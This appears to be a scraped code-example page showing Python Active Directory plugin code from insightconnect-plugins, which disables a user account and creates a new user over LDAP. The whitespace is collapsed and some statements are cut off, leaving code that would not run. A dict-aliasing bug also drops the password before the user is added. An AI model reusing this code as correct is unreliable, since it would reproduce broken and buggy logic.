not a user') raise PluginException(cause="The DN is not a user", assistance="The DN " + escaped_dn + " is not a user") from ex user_account_flag = 2 account_status = account_status | user_account_flag conn.modify(escaped_dn, {'userAccountControl': [(MODIFY_REPLACE, [account_status])]}) result = conn.result output = result['description'] if result['result'] == 0: return {'success': True} self.logger.error('failed: error message %s' % output) return {'success': False}
Example #22
Source File: From insightconnect-plugins with MIT License | 4 votes |
def run(self, params={}): conn = self.connection.conn ssl = self.connection.ssl domain_name = params.get('domain_name') first_name = params.get('first_name') last_name = params.get('last_name') logon_name = params.get('logon_name') user_ou = params.get('user_ou') account_disabled = params.get('account_disabled') password = params.get('password') additional_parameters = params.get('additional_parameters') user_principal_name = params.get('user_principal_name') if account_disabled == 'true': user_account_control = 514 else: user_account_control = 512 full_name = first_name + ' ' + last_name domain_dn = domain_name.replace('.', ',DC=') if user_ou == "Users": user_ou = user_ou.replace(',', ',CN=') else: user_ou = user_ou.replace(',', ',OU=') if user_ou == "Users": dn = 'CN={},CN={},DC={}'.format(full_name, user_ou, domain_dn) else: dn = 'CN={},OU={},DC={}'.format(full_name, user_ou, domain_dn)"User DN=" + dn) if ssl is False:'Warning SSL is not enabled. User password can not be set. User account will be disabled') parameters = {'givenName': first_name, 'sn': last_name, 'sAMAccountName': logon_name, 'userPassword': password, 'userPrincipalName': user_principal_name} parameters.update(additional_parameters) log_parameters = parameters log_parameters.pop("userPassword") conn.add(dn, ['person', 'user'], parameters) pass_set = extend.ad_modify_password(conn, dn, password, None) change_uac_attribute = {'userAccountControl': (MODIFY_REPLACE, [user_account_control])} conn.modify(dn, change_uac_attribute) return {'success': pass_set}